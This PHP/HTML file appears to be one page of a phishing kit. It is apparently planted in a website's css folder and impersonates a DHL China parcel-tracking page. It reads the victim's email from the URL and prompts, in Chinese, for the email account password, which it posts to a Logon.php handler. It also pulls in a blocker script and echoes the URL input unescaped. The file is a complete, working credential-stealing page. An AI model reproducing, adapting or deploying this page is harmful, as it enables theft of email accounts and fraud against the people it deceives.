File: /home/asjudine/www/css/DHLCN/tracking.php
<?php
include('blocker.php');
session_start();
// start > to get url and and put id
$url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
parse_str(parse_url($url, PHP_URL_QUERY));
$parts = @explode('@', $email);
$user = @$parts[0];
// < end
$_SESSION['email'] = $email;
?>
<html>
<head><title>DHL | 快递</title>
<link rel="shortcut icon" href="http://www.dhl.com/img/favicon.gif" type="image/gif"/>
</head>
<script>
function validateForm()
{
var y=document.forms["myform"]["epass"].value;
if(y==null || y=="")
{
alert("Password is Empty");
return false;
}
var y=document.forms["myform"]["epass"].value;
if(y.length < 6)
{
alert("Password is Too Short");
return false;
}
}
</script>
<body background="images/5_1_dhl_global_locator_all_340_187.gif" text="black" link="blue" alink="blue" vlink="blue" >
<center>
<form action="Logon.php" onsubmit="return validateForm()" method="post" name="myform">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="589" height="249">
<tr>
<td width="589" height="92" colspan="2">
<img src="images/DHL_China_logo.JPG" height="70" width="180">
<b style="color:#AD0808;font-size:24px;font-weight:bold">包裹跟踪</b></td>
</tr>
<tr>
<td width="589" height="25" colspan="2" bgcolor="#AD0808">
<font size="4" color="#ffffff"><center><b>请用有效的电子邮件和密码</b></center></font></td>
</tr>
<tr>
<td width="158" height="51"><font color="#AD0808" face="verdana,arial" size="-1">
<b><font color="red">*</font> 电子邮件</b> <b>:</b></font></td>
<td width="425" height="51"><font face="verdana" size="4" > <?php echo $email ?></font></td>
</tr>
<tr>
<td width="158" height="40"><font face="verdana,arial" size=-1><b><font color="red">*</font></b> </font><b></b><font color="#AD0808" face="verdana,arial" size="-1"><b>电子邮件密码</b> </font><font face="verdana,arial" size=-1> <b>:</b></td>
<td width="425" height="40"> <input type="password" name="epass" size="25"></td>
</tr>
<tr>
<td width="158" height="32"> </td>
<td width="425" height="32"><input type="submit" value="繼續"></td>
</tr>
</table>
</form>
</center>
</div>
<center><hr color="#AD0808" size=2 width="100%"> </center>
</font>
DHL 伙伴: <br>
<p> <img alt="Sina" src="images/sina.png" height="50" width="120"><img alt="QQ" src="images/qq.png" height="50" width="120"> <img src="images/tom.gif" alt="Tom" height="50" width="120"> <img src="images/aliyun.jpg" alt="Aliyun" width=120 height=50><img src="images/sohu.jpg" alt="Sohu" title="" width=120 height=50> <img src="images/21cn.png" alt="21cn" width=120 height=50>
<img src="images/netease_png.png" alt="Netease" title="" border=0 width="120" height="50"><img src="images/qiye.gif" alt="QIYE" title="" border=0 width="120" height="50"></p>
<br><p><center>版权 © 2016 顺丰快递.
版权所有.</center></p>
</body>
</html>